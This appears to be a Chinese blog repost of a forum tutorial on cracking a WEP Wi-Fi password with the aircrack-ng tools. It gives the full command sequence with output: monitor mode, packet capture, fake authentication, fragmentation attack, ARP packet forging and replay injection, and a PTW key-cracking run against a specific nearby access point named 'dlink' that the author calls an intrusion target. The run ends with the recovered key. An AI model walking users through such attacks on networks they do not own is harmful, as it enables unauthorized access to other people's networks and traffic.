无线密码破解
来源:互联网 发布:眼药水 知乎 编辑:程序博客网 时间:2024/04/29 12:17
发在论坛的帖子见: http://forum.ubuntu.org.cn/viewtopic.php?f=116&t=252764&start=0
1、打开 终端: 输入:ifconfig
得到以下结果:
[root@Archlinux ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1A:A0:FF:21:BF
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:17
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
wlan0 Link encap:Ethernet HWaddr 00:1B:77:D8:63:0C
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:1078 errors:0 dropped:0 overruns:0 frame:0
TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:303752 (296.6 Kb) TX bytes:179166 (174.9 Kb)
2、终端输入: airmon-ng start wlan0
得到如下结果:
[root@Archlinux ~]# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2013 NetworkManager
2017 wpa_supplicant
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)
3、终端输入:kill 2013 2017 #杀死上面提到的可能造成麻烦的进程<#经测试,可以不杀死进程!>
4、modprobe iwl3945 #上面得到的关于无线的结果
5、打开spoonwep,查到您想破解的无线的 信道 ——> spoonwep 开启后 会自动跳出一个扫描窗口,里面有标 ch 下面的那个数字就是信道 ,通常是 1 、6、11 ,我扫到的有以下:(只给一个例子,其实扫出来的很多)
BSSID PWR Beacons #Data ,#/s CH MB ENC CIPHER AUTH ESSID
AP'S MAC -83 197+ 133+ 0 6 54e wep wep dlink
BSSID STATION PWR Rate Lost Packets Probes
AP’S MAC mac -43 11e-1e 22+- 2000+ dlink
<只是给出例子,数值不一定是这样的,有些一直在变动>
# AP'S MAC 此处我查到的是00:24:01:CO:08:F8 (被破解,入侵目标的MAC地址)
#197+以及133+代表这个数字是一直在增加的##破解之后,我舍友使用这地址时,Data数值增长很快,但
是之前还未破解时,数值增长很慢,待会儿这个地方也会有变化
#CH下面的6,代表信道
#ENC代表加密方式,此处为wep加密
#AUTH ——>请注意,这个待会儿有所变化(具体我也解释不清,我只是使用者)
#ESSID是这个无线的名称(主人定义的)
6、终端 airmon-ng start mon0 6
···第2中有如下提示 —— (monitor mode enabled on mon0)、6是信道值···
得到如下结果:
[root@Archlinux ~]# airmon-ng start mon0 6
Process with PID 4162 (airodump-ng) is running on interface mon0
Process with PID 4170 (airodump-ng) is running on interface mon0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
mon0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon2)
mon1 Intel 3945ABG iwl3945 - [phy0]
7、下面开始抓包:(还是在终端执行)
终端输入 airodump-ng --ivs -w 333 -c 6 mon0
#此处 ivs之前两小杆,看清楚;
“333” 这个可以任意命名(后面要用到);
-c 6 是确定信道为6 mon0是上面开启的,查到的//
注意:这之后您看到和刚才在spoonwep开启的窗口类似的结果。(请不要关闭此窗口)
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:70:D2:0F:84 -1 0 0 34 12 158 -1 OPN <length: 0>
00:24:01:C0:0B:F8 -78 43 1108 1412 35 6 54e WEP WEP dlink
00:26:5A:AC:BC:D6 -83 20 871 0 0 6 54e WPA2 CCMP PSK 405
00:15:70:D2:0F:78 -84 0 92 13 0 6 54 OPN CMCC
00:1D:0F:7E:01:E4 -84 24 860 0 0 6 54 . WEP WEP FR10313
00:25:86:24:1F:86 -86 0 6 0 0 6 54 . WEP WEP F10-210
00:0E:E8:DB:33:EB -87 0 138 0 0 11 54 WPA TKIP PSK ipTIME
00:1B:2F:08:51:E6 -87 0 2 1 0 11 54 . WPA TKIP PSK NETGEAR
00:23:68:09:C9:CC -85 0 31 7 0 6 54 OPN CMCC
00:22:B0:91:64:19 -85 0 6 0 0 6 54 . WPA2 CCMP PSK Karas
00:27:19:9E:30:F6 -1 0 0 0 0 -1 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
00:15:70:D2:0F:84 00:1B:77:94:AD:04 -87 6 - 1 19 188 CMCC
(not associated) 00:22:FB:A4:DF:F4 -72 0 - 1 0 55
8、终端输入:aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
#此处 -e 后面的是AP‘S ESSID
-a 之后是AP'S BSSID 就是ap的mac地址
-h 之后是自己的mac地址
得到如下结果:
[root@Archlinux ~]# aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
14:48:53 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
14:48:53 Sending Authentication Request (Open System) [ACK]
14:48:53 Authentication successful
14:48:53 Sending Association Request [ACK]
14:48:53 Association successful :-) (AID: 1)
这时候,刚才未关闭的那个窗口 ,即 airodump-ng 窗口 变化显著(可能)
如很明显,则当data数值增长到10000多的时候可以直接运行下面的命令破解:
_______________________________________________________________________________
[root@Archlinux ~]# aircrack-ng -n 64 -b 002401C00BF8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote)
0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
Failed. Next try with 5000 IVs.
# 我的没有很快的增长(只有1412),所以这里失败了,下面继续(还是可以破解的:—)心急吃不了热豆腐@!
_________________________________________________________________________________________________________________
9、aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
15:07:10 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 5
15:07:11 mon0 is on channel 5, but the AP uses channel 6
[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon1
15:07:29 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30 Waiting for a data packet...
Read 2691 packets...
Size: 328, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:24:01:C0:0B:F8
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:24:01:C0:0B:F8
0x0000: 0842 0000 0100 5e7f fffa 0024 01c0 0bf8 .B....^...$....
0x0010: 0024 01c0 0bf8 d066 327e 0200 df2e 869e .$.....f2~......
0x0020: ec2f 54f3 1607 352f b790 45f2 414d 03c2 ./T...5/..E.AM..
0x0030: b9ad de4a 12c1 8da4 a3ad 0d02 801b 35d4 ...J..........5.
0x0040: 8911 ad85 e45f ac37 cfff f38b dc41 a600 ....._.7.....A..
0x0050: 5b21 01cf 9838 d95c d6ef bedc b898 7ec6 [!...8./......~.
0x0060: 0491 4035 cf43 622d bdfb de72 6964 0299 ..@5.Cb-...rid..
0x0070: f2da f200 d5be c5c7 1a59 7e16 d081 078f .........Y~.....
0x0080: 8f26 3710 dce0 4cb9 5e32 f043 7108 672a .&7...L.^2.Cq.g*
0x0090: 3fa2 e3f9 e7fd ef46 1e3a d911 dc9a 2d1d ?......F.:....-.
0x00a0: 1fa0 598a a787 36a0 8e5e ead1 abb8 96b1 ..Y...6..^......
0x00b0: a6f8 6525 83f5 9b33 1dbd 3fcb b37c 3e2f ..e%...3..?..|>/
0x00c0: 9462 9146 d4a9 0ee9 600d 312d 9b44 b6bb .b.F....`.1-.D..
0x00d0: c5ec 2806 f1be 1b48 0a95 be99 d1c2 6928 ..(....H......i(
--- CUT ---
Use this packet ?
现在选 y
Use this packet ? y
Saving chosen packet in replay_src-0111-150843.cap
15:09:17 Data packet found!
15:09:17 Sending fragmented packet
15:09:19 No answer, repeating...
15:09:19 Trying a LLC NULL packet
15:09:19 Sending fragmented packet
15:09:20 No answer, repeating...
15:09:20 Sending fragmented packet
15:09:22 No answer, repeating...
15:09:22 Trying a LLC NULL packet
15:09:22 Sending fragmented packet
15:09:23 No answer, repeating...
15:09:23 Sending fragmented packet
15:09:23 Got RELAYED packet!!
15:09:23 Trying to get 384 bytes of a keystream
15:09:23 Got RELAYED packet!!
15:09:23 Trying to get 1500 bytes of a keystream
15:09:23 Got RELAYED packet!!
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
[root@Archlinux ~]#
看到上面几句关键的话:
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
输入 y 后,系统开始发送数据,airodump-ng 窗口一下就有了反应,Data 数立即增长,就没有必要进行下面的步骤了,等 Data 有 1 万 5 就用aircrack-ng 破出了密码。)
继续看下面的——
10、输入ls 查看刚才的文件名,方便待会儿copy下:—)
[root@Archlinux ~]# ls
333-01.ivs Desktop fragment-0111-150923.xor
333-02.ivs Downloads replay_src-0111-150843.cap
[root@Archlinux ~]#
终端输入: packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:77:D8:63:0C -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w mrarp
得到:
[root@Archlinux ~]# packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:77:D8:63:0C -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w mrarp
Wrote packet to: mrarp
11、aireplay-ng -2 –r mrarp -x 1024 mon1
#此处填写的是 mon1 原因自己看下(aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon1
15:07:29 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30 Waiting for a data packet...
Read 2691 packets...这里是mon1哟)
[root@Archlinux ~]# aireplay-ng -2 -r mrarp -x 1024 mon1
No source MAC (-h) specified. Using the device MAC (00:1B:77:D8:63:0C)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:24:01:C0:0B:F8
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:1B:77:D8:63:0C
0x0000: 0841 0201 0024 01c0 0bf8 001b 77d8 630c .A...$......w.c.
0x0010: ffff ffff ffff 8001 437e 0200 769d a167 ........C~..v..g
0x0020: e1af 7926 ebca 352f b7cb 1002 53d7 59d3 ..y&..5/....S.Y.
0x0030: bb77 0e95 8732 d16a 2e18 0a49 0bd1 2acf .w...2.j...I..*.
0x0040: c256 37aa .V7.
Use this packet ?
选y
得到:
Saving chosen packet in replay_src-0111-151709.cap
You should also start airodump-ng to capture replies.
此时dump那个窗口data 哗哗的上涨
12、另外再开一个terminal 输入:
ls
得到:
[root@Archlinux ~]# ls
333-01.ivs Desktop fragment-0111-150923.xor replay_src-0111-150843.cap
333-02.ivs Downloads mrarp replay_src-0111-151709.cap
[root@Archlinux ~]#
输入:
aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs (之所以是02是因为当时我关闭了一次抓包窗口,所以ls之后有两个ivs)
得到:
[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote)
0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
Failed. Next try with 5000 IVs. (错了,是因为当时我关闭了一次airedump-ng 窗口,后来又再次运行那个命令生出另一个ivs)
[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs #原因如上
Opening 333-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 34551 ivs.
Aircrack-ng 1.0
[00:00:00] Tested 154 keys (got 17607 IVs)
KB depth byte(vote)
0 0/ 1 15(27136) 5A(23552) 7D(23040) A4(22784) A2(22528)
1 3/ 8 80(22272) E4(22272) 17(22016) 48(22016) 66(21760)
2 1/ 3 BE(23808) EE(23296) 1E(23040) 87(23040) 89(23040)
3 0/ 4 12(24832) 69(23552) 5B(23296) D0(23296) AE(23040)
4 0/ 2 06(24064) 7F(23296) AE(22272) 69(22016) DE(22016)
KEY FOUND! [ 15:80:59:12:06 ]
Decrypted correctly: 100%
[root@Archlinux ~]#
这里就是密码了。8)
13、看的这里的不容易:
给一个最好的方法:
打开spoonwep客户端,找到要攻击的mac地址以及信道
终端输入如下命令:wesside-ng -i mon0 -v 目标的 MAC
最后 ,为了停止抓包,请输入:
sudo airmon-ng stop mon0
- 无线路由器密码破解
- 无线密码破解
- 无线路由器密码破解
- 无线路由密码破解
- 无线路由密码破解
- 无线路由器密码破解
- N9破解无线密码
- 无线密码破解技术
- 无线路由器密码破解链接
- 【转】无线路由器密码破解
- [转]破解无线路由器密码
- 无线密码破解利器最新版
- 无线wifi密码的破解
- 【转】无线路由密码破解
- 无线路由器WiFi密码破解
- kali无线wifi密码破解
- 怎么破解wifi密码?如何破解无线路由器密码?
- 如何破解无线路由器密码,如何破解WEP密码,破解无线路由器
- java开发环境部署
- Fedora 11如何安装MPEG1 layer3 解码器
- 也说Pizza问题:分享几个漂亮的证明
- linux和windows双系统,重装windows,修复grub (grub0.97)
- C#正则表达式编程(二):Regex类用法
- 无线密码破解
- C#正则表达式编程(三):Match类和Group
- 电源低功耗设计分析
- archlinux 简单安装、配置、使用(部分原创,部分转贴)
- Android开发环境搭建
- 一次失败的淘宝经历
- linux桌面壁纸自动换(类似于windows7壁纸自动换)
- oracle 检查被锁的表及解锁
- Expression Blend实例中文教程(2) - 界面快速入门